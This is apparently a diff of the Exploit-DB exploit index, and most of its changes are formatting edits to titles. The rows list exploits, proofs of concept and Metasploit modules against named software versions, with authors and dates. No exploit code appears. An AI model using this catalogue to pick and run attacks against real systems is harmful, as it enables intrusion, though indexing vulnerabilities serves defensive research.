18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 18093,platforms/windows/remote/18093.txt,"Oracle XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 -18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 (do.php) - CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 +18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - (do.php) CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 @@ -15774,7 +15774,7 @@ id,file,description,date,author,platform,type,port 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 -18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 +18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 @@ -15845,7 +15845,7 @@ id,file,description,date,author,platform,type,port 18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 -18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 +18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash PoC",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18272,platforms/windows/dos/18272.py,"Windows Explorer - Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 @@ -15869,7 +15869,7 @@ id,file,description,date,author,platform,type,port 18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 18298,platforms/php/webapps/18298.txt,"Php-X-Links Script - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 18300,platforms/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection",2012-01-02,ITTIHACK,php,webapps,0 -18982,platforms/windows/webapps/18982.txt,"Hexamail Server 4.4.5 Persistent XSS",2012-06-04,modpr0be,windows,webapps,0 +18982,platforms/windows/webapps/18982.txt,"Hexamail Server 4.4.5 - Persistent XSS",2012-06-04,modpr0be,windows,webapps,0 19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 18305,platforms/php/dos/18305.py,"PHP Hash Table Collision Proof Of Concept",2012-01-03,"Christian Mehlmauer",php,dos,0 18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 @@ -15892,7 +15892,7 @@ id,file,description,date,author,platform,type,port 18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0Day)",2012-01-08,"b33f & g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0 -18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 +18336,platforms/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service",2012-01-08,JaMbA,windows,dos,0 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - (.lst) Local Denial of Service",2012-01-09,"Julien Ahrens",windows,dos,0 @@ -15900,7 +15900,7 @@ id,file,description,date,author,platform,type,port 18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x - (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 -18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal",2012-01-10,chap0,php,webapps,0 +18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 - Path Traversal",2012-01-10,chap0,php,webapps,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 @@ -15921,7 +15921,7 @@ id,file,description,date,author,platform,type,port 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",2012-01-14,Metasploit,windows,remote,0 -18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption",2012-01-14,Metasploit,windows,local,0 +18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption",2012-01-14,Metasploit,windows,local,0 18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 @@ -15980,7 +15980,7 @@ id,file,description,date,author,platform,type,port 18434,platforms/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album Blind SQL Injection",2012-01-31,"Red Security TEAM",php,webapps,0 -18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 Persistent XSS",2012-01-31,HauntIT,php,webapps,0 +18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 - Persistent XSS",2012-01-31,HauntIT,php,webapps,0 18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - (officeviewermme.ocx) BoF PoC",2012-01-31,LiquidWorm,windows,dos,0 18441,platforms/php/webapps/18441.txt,"Vastal I-Tech Agent Zone - (search.php) Blind SQL Injection",2012-01-31,"Cagri Tepebasili",php,webapps,0 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 @@ -16021,7 +16021,7 @@ id,file,description,date,author,platform,type,port 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling",2012-02-16,Metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF",2012-02-16,"Ivano Binetti",php,webapps,0 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 @@ -16066,7 +16066,7 @@ id,file,description,date,author,platform,type,port 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 -18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,Metasploit,windows,remote,0 +18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 - Profile",2012-02-29,Metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server Information Disclosure",2012-02-29,"SecPod Research",windows,remote,0 @@ -16119,7 +16119,7 @@ id,file,description,date,author,platform,type,port 18603,platforms/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,Metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 -18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 +18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent XSS for logged in users",2012-03-16,storm,php,webapps,0 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple CSRF Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 @@ -16133,7 +16133,7 @@ id,file,description,date,author,platform,type,port 18621,platforms/windows/remote/18621.txt,"Dell Webcam Software Bundled ActiveX Remote Buffer Overflow",2012-03-19,rgod,windows,remote,0 18622,platforms/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Code Execution",2012-03-19,rgod,windows,remote,0 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 -18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 +18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal",2012-03-19,rgod,jsp,webapps,0 18628,platforms/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 @@ -16141,7 +16141,7 @@ id,file,description,date,author,platform,type,port 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,android,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum - (topic.php) SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 -18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 +18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - .Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage",2012-03-21,Metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 @@ -16167,7 +16167,7 @@ id,file,description,date,author,platform,type,port 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 -18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 +18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - CSRF Add Admin",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow",2012-03-26,Metasploit,windows,remote,0 @@ -16186,7 +16186,7 @@ id,file,description,date,author,platform,type,port 18682,platforms/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection",2012-03-30,"SecPod Research",php,webapps,0 18683,platforms/windows/remote/18683.py,"MailMax 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 - CSRF",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 -18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 +18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 @@ -16195,7 +16195,7 @@ id,file,description,date,author,platform,type,port 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - CSRF (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 -18708,platforms/php/webapps/18708.txt,"GENU CMS SQL Injection",2012-04-05,"hordcode security",php,webapps,0 +18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 @@ -16205,7 +16205,7 @@ id,file,description,date,author,platform,type,port 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm / .mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 -18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 +18722,platforms/cgi/webapps/18722.txt,"ZTE - Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Auth OS Command Injection",2012-04-09,Metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 @@ -16233,14 +16233,14 @@ id,file,description,date,author,platform,type,port 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 -18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0 +18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0 18755,platforms/windows/dos/18755.c,"Windows - Afd.sys Proof of Concept (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - (.mp4) Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,Metasploit,windows,local,0 -18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 +18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 - (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 @@ -16278,7 +16278,7 @@ id,file,description,date,author,platform,type,port 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin 2.4.2 - Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 -18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 +18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 @@ -16299,7 +16299,7 @@ id,file,description,date,author,platform,type,port 18834,platforms/php/remote/18834.rb,"PHP CGI Argument Injection",2012-05-04,Metasploit,php,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18861,platforms/windows/local/18861.php,"PHP 5.4.3 - Code Execution (Win32)",2012-05-11,0in,windows,local,0 -18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 +18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 18836,platforms/php/remote/18836.py,"PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection Exploit",2012-05-05,rayh4c,php,remote,0 @@ -16322,7 +16322,7 @@ id,file,description,date,author,platform,type,port 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,Metasploit,windows,remote,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18868,platforms/php/webapps/18868.txt,"Sockso 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 -18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,Metasploit,windows,remote,0 +18870,platforms/windows/remote/18870.rb,"Firefox 8/9 - AttributeChildRemoved() Use-After-Free",2012-05-13,Metasploit,windows,remote,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 @@ -16335,7 +16335,7 @@ id,file,description,date,author,platform,type,port 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend XSS / SQLi",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 -18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 +18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 @@ -16373,7 +16373,7 @@ id,file,description,date,author,platform,type,port 18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 -18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution",2012-05-28,Metasploit,linux,remote,0 +18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution",2012-05-28,Metasploit,linux,remote,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection",2012-05-28,loneferret,php,webapps,0 @@ -16397,11 +16397,11 @@ id,file,description,date,author,platform,type,port 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 -18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 +18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 